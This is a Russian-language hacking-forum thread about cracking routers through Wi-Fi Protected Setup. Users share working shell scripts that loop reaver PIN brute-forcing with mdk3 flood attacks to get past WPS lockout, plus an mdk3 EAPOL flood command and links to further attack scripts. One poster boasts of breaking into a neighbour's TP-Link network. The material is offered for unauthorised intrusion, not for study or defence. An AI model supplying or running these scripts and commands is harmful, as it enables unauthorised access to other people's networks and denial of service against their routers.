Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    а канал точка менять может :) может лучше без канала?я вообще нигде канал не ставлю,что бы автоматом находил,а то точки меняют каналы :)
     
  2. VladimirV

    VladimirV Well-Known Member

    Joined:
    1 Apr 2013
    Messages:
    1,130
    Likes Received:
    6,150
    Reputations:
    57
    Пару дней назад сломал соседа TP-Link который был в локе пол года. Мне в личку написал 4pips за что ему большое СПАСИБО, и дал скрипт с помощью которого он ломал TP-Link_и при помощи mdk3.
    Вот его код:
    Code:
    #!/bin/sh
    while true;
    # Run reaver to work 50s
    do timeout -s SIGINT 50s reaver -i mon0 -b 64:66:B3:AC:XX:XX -N -S -L -s /etc/reaver/6466B3ACXXXX.wpc -v;
    sleep 4;
    # Run mdk3 to work 10s
    echo [+] Mdk3 is working ...
    timeout 10s mdk3 mon0 a -a 64:66:B3:AC:XX:XX -m &>/dev/null;
    echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C] ;
    sleep 24;
    done;
    
    У меня он не заработал и я его переделал:
    Code:
    #!/bin/bash
    while true;
    # Run reaver to work 10 pin
    echo
    echo
    echo [+] reaver is working ...
    do
    reaver -i mon0 -b 10:FE:ED:5A:XX:XX -vv -L -g 10 -s /etc/reaver/10FEED5AXXXX.wpc;
    
    # Run mdk3 to work 3s
    echo
    echo
    echo [+] Mdk3 is working ...
    gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 mon0 a -a 10:FE:ED:5A:XX:XX";
    sleep 3;
    killall mdk3 2> /dev/null;
    echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C];
    sleep 14;
    done;
    
    и меньше чем за сутки взломал эту сеть!

    sleep 3 - это сколько секунд шарашит mdk3
    sleep 14 - пауза до появления точки в эфире
    -g 10 - сколько пинов перебирать

    Точка от меня через перекрытие и я поставил подбор на 10 пинов но если при подборе были ошибки то reaver зависал и надо было нажать ctrl+c.
    Скорость перебора reaver была 2 пина в секунду + пауза + работа mdk3 + поиск точки reaverom по каналам = 48 - 50 секунд на 10 пинов.
    https://forum.antichat.ru/threads/310835/page-193#post-4037706
     
    #2062 VladimirV, 31 Aug 2014
    Last edited: 18 Jan 2017
  3. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    что то слишком красиво и легко :) ,у меня этот mdk3 никаких проблем никакой точке не доставляет :)
    Это конкретно к тплинкам?а как скрипт на другие точки действует,типа асусов,пробовал?
    Прям так точка и здавалась легко на mdk3?значит точка такая,повезло :) а функция конкретно в скрипте mdk3 какая,навешивание ложных клиентов или деаут клиентов,или какая другая функция?
     
    #2063 СЕРЖ32, 31 Aug 2014
    Last edited: 31 Aug 2014
  4. VladimirV

    VladimirV Well-Known Member

    Joined:
    1 Apr 2013
    Messages:
    1,130
    Likes Received:
    6,150
    Reputations:
    57
    Проверял на точках которые мне доступны - кроме TP-Link ни одна не повелась. И из TP-Link ведется %25-30. Но Это лучше чем ничего!!!
     
  5. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    а не мало ли mdk3 работает?3 сек всего :) что это за точки,которые от 3 сек падать будут :D ,я вон миллионы клиентов цеплял,точкам пофиг,тоже тп линк :)
    Говорю ж....красиво всё как то :) ну или там у тебя такие точки попадаются слабые :)
     
  6. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,135
    Likes Received:
    1,931
    Reputations:
    24
    Все работает как надо, тп линк 740 от скрипта сдулся. Более мощные точки, типа 1043 на левых клиентов ложили свои большие черные.... антенны :D
     
  7. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    вот и я ж говорю :) то какие точки просто,видимо слабые сдуваются только,а мощным,хоть миллиард клиентов вешай :D
    Я ж прочитал скрипт и удивился,что mdk3 3 сек только работает,сколько он клиентов на точку повесит :D ,mdk3 нужно на пол часа оставлять,может и будет эффект :)
     
  8. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    незнаю,что у вас там за точки вокруг слабые,я сейчас скрипт опробывал,в mdk3 время на минуту поставил,и ничего.....
    та я на ночь mdk3 ставил,до десятка миллиона клиентов цеплял на точку(точки)и пофиг точкам :) У вас там просто такие точки,старые наверное,которые от 3 сек mdk3 сдуваются :D
     
  9. UnitUnique

    UnitUnique New Member

    Joined:
    27 Sep 2009
    Messages:
    56
    Likes Received:
    2
    Reputations:
    0
    подскажите , что делать. нашел пароль (Inflator v 1.0 в нем - Reaver 1.4-r119) - по привычке нажал Ctrl-C, думал скопировать ;), окно естественно закрылось, но при повторном запуске (в нифляторе тут же нажал Run с теми же параметрами без перезапуска последнего) процесс продолжился с 91% и потом пошли пляски 99.99% один и один тот же пин перебирает и ошибки 25 successive start failures. Почему сессия так криво сохранилась ? Тут кто-то команду вроде выкладывал, что якобы должно показать сразу найденный ключ при повторном запуске, не могу найти...

    p.s. добавил --pin xxxxxxxx, теперь опять пошло с 90% и проценты растут, но пин все тот же каждый раз вбивает (wps transaction failed, re-trying last pin), посмотрим, что будет...
     
    #2069 UnitUnique, 1 Sep 2014
    Last edited: 1 Sep 2014
  10. SlNik

    SlNik Active Member

    Joined:
    7 Feb 2014
    Messages:
    323
    Likes Received:
    136
    Reputations:
    1
    Вот засада! Прийдется всё заново пересчитывать!
    А если серьезно, то -p хххх. Вбивай первые ЧЕТЫРЕ цифры подобранного пина, а вторую часть прийдется пересчитать. Это займет не так уж много времени.
    Такие глюки иногда встречаются. Первая часть уже подобрана верно.
     
  11. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    ну что,у кого ещё скрипт работает?(ривер и мдк3)?у меня то скрипт пашет,а толку :) увеличил уже в скрипте продолжительность работы мдк3,точкам всё равно,хоть миллиард клиентов вешай :) Незнаю.....видимо мдк3 действует на какие то древние точки,новым пофиг эти все атаки...
     
  12. UnitUnique

    UnitUnique New Member

    Joined:
    27 Sep 2009
    Messages:
    56
    Likes Received:
    2
    Reputations:
    0
    спасибо, помогло, странно, что я так не попробовал, тут вроде не раз писалось...
     
  13. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    что то уже тема мёртвая :) ,видимо потому,что уже wps не актуален,уже у людей новые точки,где wps лочится навсегда,и никакой mdk3 не берёт,и ничего нового придумать не могут,что бы эти локи обойти.....
    Вот тема и не развивается....
     
  14. ivantaan

    ivantaan New Member

    Joined:
    17 Nov 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Друзья, есть новая уязвимость WPS у некоторых вендоров, она основана на низкой энтропии при генерации WPS кода на некоторых чипах BroadComm. (Грубо говоря, при каждой перезагрузке точки она генерирует один и тот же пин с большой вероятностью.) На августовской Black Hat 2014 конференции был продемонстрирован подбор WPS кода с 1-10 попыток на точках 2, пока мне неизвестных вендоров.
    Вот презентация частично описывающия уязвимость:
    http://www.engadget.com/2014/08/31/wifi-protected-setup-flaw/
    У когото есть еще инфа?
     
  15. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
  16. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,810
    Likes Received:
    18,420
    Reputations:
    377
    В примере показана EAPOL FLOOD ATTACK на точку доступа,
    парень включил ее с нескольких режимов monitor mode (mon1, mon2...)
    Сама атака:
    mdk3 mon0 x 0 -t ff:ff:ff:ff:ff:ff -n "Essid AP" - s 50000

    -t - указываем BSSID Точки доступа
    -n - указываем Названи Точки доступа (ESSID)
    -s - указываем колличество EAPOL пакетов в секунду (в примере их 50000)

    В конце видео показано, что точка перезагружается и wps lock снимается.
     
    _________________________
    #2076 user100, 3 Sep 2014
    Last edited: 3 Sep 2014
    quite gray likes this.
  17. saimonyz

    saimonyz Member

    Joined:
    23 Jun 2012
    Messages:
    156
    Likes Received:
    41
    Reputations:
    2
    вообще можно юзать ReVdK3-r1.sh

    Видео
    https://www.youtube.com/watch?v=zf93xJ7xD2k#t=74
    Скачать
    http://www32.zippyshare.com/v/12811261/file.html
    Почитать
    https://forums.kali.org/showthread.php?19498-MDK3-Secret-Destruction-Mode

    Есть ещё FrankenScript 2 , Atrophy
     
    #2077 saimonyz, 3 Sep 2014
    Last edited: 3 Sep 2014
    quite gray and user100 like this.
  18. chernec

    chernec Member

    Joined:
    7 Oct 2013
    Messages:
    57
    Likes Received:
    10
    Reputations:
    0
    Подскажите, на какой ОС лучше запускать скрипт, на wifislax не получилось, опишите пожалуйста
     
  19. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,135
    Likes Received:
    1,931
    Reputations:
    24
    Смысл в том, что роутер должен не справиться с наплывом желающих присосаться и отправиться в ребут. Тема та же, что и с навешиванием левых клиентов на точку, только работает иначе.
    На кали линукс заработало, но как бы без разницы, на чем его запускать, срабатывает он крайне редко.
     
  20. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    Что то подсказывает,что современным роутерам,с новыми прошивками,такая атака тоже до одного места,как и mdk3 классический :) ,не будут они ребутится....
    Та да....скрипт то включается.работает.только толку 0,ну или только если натравливать на старые роутеры,а так просто работает скрипт и всё,хоть на сутки включай работу mdk3 :)